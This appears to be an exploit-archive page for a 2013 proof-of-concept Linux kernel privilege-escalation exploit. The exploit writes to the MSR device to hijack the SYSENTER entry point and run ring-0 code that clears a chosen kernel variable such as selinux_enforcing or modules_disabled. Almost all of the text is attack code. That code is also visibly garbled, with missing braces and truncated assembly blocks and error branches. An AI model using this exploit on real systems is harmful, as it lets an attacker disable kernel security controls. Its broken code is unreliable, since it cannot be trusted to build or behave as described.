Linux Kernel 3.7.6 (RedHat x86x64) - MSR Driver Privilege Escalation

Type exploitpack
Reporter spender
Modified 2013-08-02T00:00:00


Linux Kernel 3.7.6 (RedHat x86x64) - MSR Driver Privilege Escalation

                                            // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
// can do whatever in the commented area, re-enable module support, etc
// requires CONFIG_X86_MSR and just uid 0
// a small race exists between the time when the MSR is written to the first 
// time and when we issue our sysenter
// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
// configured to take a hex arg of a dword pointer to set to 0
// (modules_disabled, selinux_enforcing, take your pick)
// Hello to Red Hat, who has shown yet again to not care until a 
// public exploit is released.  Not even a bugtraq entry existed in 
// their system until this was published -- and they have a paid team
// of how many?
// It's not as if I didn't mention the problem and existence of an easy 
// exploit multiple times prior:
// spender 2013

#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/mman.h>

#define SYSENTER_EIP_MSR 0x176

u_int64_t msr;

unsigned long ourstack[65536];

u_int64_t payload_data[16];

extern void *_ring0;
extern void *_ring0_end;

void ring0(void)
__asm volatile(".globl _ring0\n"
	".intel_syntax noprefix\n"
	// set up stack pointer with 'ourstack'
	"mov esp, ecx\n"
	// save registers, contains the original MSR value
	"push rax\n"
	"push rbx\n"
	"push rcx\n"
	"push rdx\n"
	// play with the kernel here with interrupts disabled!
	"mov rcx, qword ptr [rbx+8]\n"
	"test rcx, rcx\n"
	"jz skip_write\n"
	"mov dword ptr [rcx], 0\n"
	// restore MSR value before returning
	"mov ecx, 0x176\n" // SYSENTER_EIP_MSR
	"mov eax, dword ptr [rbx]\n"
	"mov edx, dword ptr [rbx+4]\n"
	"pop rdx\n"
	"pop rcx\n"
	"pop rbx\n"
	"pop rax\n"
	".att_syntax prefix\n"
        ".global _ring0_end\n"

unsigned long saved_stack;

int main(int argc, char *argv[])
	cpu_set_t set;
	int msr_fd;
	int ret;
	u_int64_t new_msr;
	struct sched_param sched;
	u_int64_t resolved_addr = 0ULL;

	if (argc == 2)
		resolved_addr = strtoull(argv[1], NULL, 16);

	/* can do this without privilege */
	mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);
	mlock(&payload_data, sizeof(payload_data));

	CPU_SET(0, &set);

	sched.sched_priority = 99;

	ret = sched_setscheduler(0, SCHED_FIFO, &sched);
	if (ret) {
		fprintf(stderr, "Unable to set priority.\n");

	ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);
	if (ret) {
		fprintf(stderr, "Unable to set affinity.\n");

	msr_fd = open("/dev/cpu/0/msr", O_RDWR);
	if (msr_fd < 0) {
		msr_fd = open("/dev/msr0", O_RDWR);
		if (msr_fd < 0) {
			fprintf(stderr, "Unable to open /dev/cpu/0/msr\n");
	lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
	ret = read(msr_fd, &msr, sizeof(msr));
	if (ret != sizeof(msr)) {
		fprintf(stderr, "Unable to read /dev/cpu/0/msr\n");

	// stuff some addresses in a buffer whose address we
	// pass to the "kernel" via register
	payload_data[0] = msr;
	payload_data[1] = resolved_addr;

	printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);

	lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
	new_msr = (u_int64_t)(unsigned long)&_ring0;

	printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);

	ret = write(msr_fd, &new_msr, sizeof(new_msr));
	if (ret != sizeof(new_msr)) {
		fprintf(stderr, "Unable to modify /dev/cpu/0/msr\n");

	__asm volatile(
		".intel_syntax noprefix\n"
		"mov saved_stack, esp\n"
		"lea ecx, ourstack\n"
		"lea edx, label2\n"
		"lea ebx, payload_data\n"
		"mov esp, saved_stack\n"
		".att_syntax prefix\n"

	return 0;